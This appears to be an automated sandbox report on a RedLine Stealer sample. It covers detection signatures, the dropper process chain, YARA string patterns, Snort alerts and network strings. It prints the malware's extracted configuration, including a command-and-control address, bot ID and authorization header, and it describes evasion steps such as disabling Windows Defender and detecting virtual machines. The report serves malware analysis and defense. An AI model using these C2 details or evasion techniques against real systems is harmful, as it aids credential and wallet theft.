Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:816370
MD5:0c8e10cf6146a0f67d5e4f784c251ffe
SHA1:ec1922422ad71e92c53acbe0db7f27161fc8a426
SHA256:f4e5103746728e49e2aad05ffc1f61d58a9f61071a822642779d5980d001e54f
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 5956 cmdline: C:\Users\user\Desktop\file.exe MD5: 0C8E10CF6146A0F67D5E4F784C251FFE)
    • pluT14Nj54.exe (PID: 3600 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe MD5: D16ACC7C93BF0ECC8BE14CAE8BE1F15A)
      • plct23La85.exe (PID: 4552 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe MD5: A19D601A69B407CED85F6C6E721D0E2C)
        • plvy67MJ29.exe (PID: 5192 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe MD5: C55924DDF020D2D574D1FF1BDF1446FC)
          • buze36rj14.exe (PID: 3472 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe MD5: 23F943F98B2EEF1D8427BA90111C34E2)
          • caQi43qE17.exe (PID: 4632 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe MD5: 93E470CB72A45CE819FF3EDB9B4A51B3)
  • rundll32.exe (PID: 4280 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 4908 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3624 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3268 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.24:4123", "Bot Id": "dunkan", "Authorization Header": "505c396c57c6287fc3fdc5f3aeab0819"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1a430:$pat14: , CommandLine:
        • 0x1349d:$v2_1: ListOfProcesses
        • 0x1327c:$v4_3: base64str
        • 0x13dfb:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x1280f:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        SourceRuleDescriptionAuthorStrings
        0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x2d6b6:$pat14: , CommandLine:
              • 0x1f7a9:$v2_1: ListOfProcesses
              • 0x1decf:$v4_3: base64str
              • 0x1de8e:$v4_4: stringKey
              • 0x1ded9:$v4_5: BytesToStringConverted
              • 0x1dec4:$v4_6: FromBase64
              • 0x1f464:$v4_8: procName
              • 0x1cbb6:$v5_5: FileScanning
              • 0x1cdd4:$v5_7: RecordHeaderField
              • 0x1cd06:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
              0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
              • 0x16b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              10.2.caQi43qE17.exe.4a80ee8.5.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                10.2.caQi43qE17.exe.4a80ee8.5.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x2a9ce:$pat14: , CommandLine:
                • 0x1cac1:$v2_1: ListOfProcesses
                • 0x1b1e7:$v4_3: base64str
                • 0x1b1a6:$v4_4: stringKey
                • 0x1b1f1:$v4_5: BytesToStringConverted
                • 0x1b1dc:$v4_6: FromBase64
                • 0x1c77c:$v4_8: procName
                • 0x19ece:$v5_5: FileScanning
                • 0x1a0ec:$v5_7: RecordHeaderField
                • 0x1a01e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                10.2.caQi43qE17.exe.7e6cce.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  10.2.caQi43qE17.exe.7e6cce.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x2b8b6:$pat14: , CommandLine:
                  • 0x1d9a9:$v2_1: ListOfProcesses
                  • 0x1c0cf:$v4_3: base64str
                  • 0x1c08e:$v4_4: stringKey
                  • 0x1c0d9:$v4_5: BytesToStringConverted
                  • 0x1c0c4:$v4_6: FromBase64
                  • 0x1d664:$v4_8: procName
                  • 0x1adb6:$v5_5: FileScanning
                  • 0x1afd4:$v5_7: RecordHeaderField
                  • 0x1af06:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  10.2.caQi43qE17.exe.4b50000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 30 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.3193.233.20.244969941232043233 02/27/23-21:18:20.122346
                    SID:2043233
                    Source Port:49699
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:193.233.20.24192.168.2.34123496992043234 02/27/23-21:18:21.439552
                    SID:2043234
                    Source Port:4123
                    Destination Port:49699
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.233.20.244969941232043231 02/27/23-21:18:31.861096
                    SID:2043231
                    Source Port:49699
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                    Source: file.exeReversingLabs: Detection: 64%
                    Source: file.exeVirustotal: Detection: 54%Perma Link
                    Source: file.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeReversingLabs: Detection: 74%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeVirustotal: Detection: 68%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeReversingLabs: Detection: 53%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeVirustotal: Detection: 47%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exeReversingLabs: Detection: 25%
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exeVirustotal: Detection: 26%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeReversingLabs: Detection: 53%
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exeReversingLabs: Detection: 25%
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeJoe Sandbox ML: detected
                    Source: 3.3.plvy67MJ29.exe.4fa6d7e.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 2.3.plct23La85.exe.4e6a220.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 1.3.pluT14Nj54.exe.47fe420.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.24:4123", "Bot Id": "dunkan", "Authorization Header": "505c396c57c6287fc3fdc5f3aeab0819"}
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00172F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00392F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00392F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00132F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00132F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00FD2F1D

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeUnpacked PE file: 10.2.caQi43qE17.exe.400000.0.unpack
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
                    Source: Binary string: wextract.pdbGCTL source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: plvy67MJ29.exe, 00000003.00000003.259906180.0000000004FA4000.00000004.00000020.00020000.00000000.sdmp, buze36rj14.exe, 00000004.00000000.260096763.0000000000902000.00000002.00000001.01000000.00000007.sdmp, buze36rj14.exe.3.dr
                    Source: Binary string: _.pdb source: caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00172390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00392390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00392390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00132390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00132390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00FD2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_0246EC20

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49699 -> 193.233.20.24:4123
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49699 -> 193.233.20.24:4123
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.24:4123 -> 192.168.2.3:49699
                    Source: Malware configuration extractorURLs: 193.233.20.24:4123
                    Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                    Source: Joe Sandbox ViewIP Address: 193.233.20.24 193.233.20.24
                    Source: global trafficTCP traffic: 192.168.2.3:49699 -> 193.233.20.24:4123
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
